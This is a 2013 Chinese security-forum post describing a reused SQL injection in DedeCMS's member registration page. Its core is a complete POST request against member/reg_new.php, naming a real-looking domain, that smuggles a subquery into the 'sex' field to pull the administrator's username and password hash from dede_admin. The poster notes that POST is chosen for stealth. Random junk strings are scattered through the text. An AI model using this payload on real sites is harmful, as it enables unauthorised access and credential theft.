找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2273|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
4 ?" h2 N" z; M/ Y' Y9 G: s简要描述:6 j4 M) ?2 J$ t( c+ k

, r( @9 R5 f# A需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
  H- I7 x/ B4 j原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.* U8 u8 u% q* U+ `/ G+ U
详细说明:跟这个漏洞
) @) g0 C% G8 J: J* p2 u
& O# w: ~, [3 E. z9 ~/ GWooYun: Dedecms SQL注射导致审核机制绕过漏洞
; p4 j% i; c0 q8 X% N& o* E; J是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的., l: d& l& K# t& O7 m
POST提交以下数据,其实不用POST提交的,这样隐蔽点./ \  ?& n9 Q8 X% Z4 a, |' O" Q& k

* Q. S' T/ n" [% Z: swww.political-security.com/member/reg_new.php
3 @' f  P* a6 W* \ 3 ^) b, a/ {& ?* g; ?
POST
4 \; u, d8 d3 ?
2 b1 s' t4 Q! J8 l& U9 }dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&# l1 t/ o* \' `" m$ @; J6 S8 D) O
userid=c4rp3nt3r&uname=c4rp3nt3r' `( {7 u' Y: M4 S% Z( P3 Q
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
6 @; R  B. \5 Y% e+ `&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,2 j! O% g8 V* O9 i  L% n
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
7 L( a" S! S3 N4 X' h, F%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表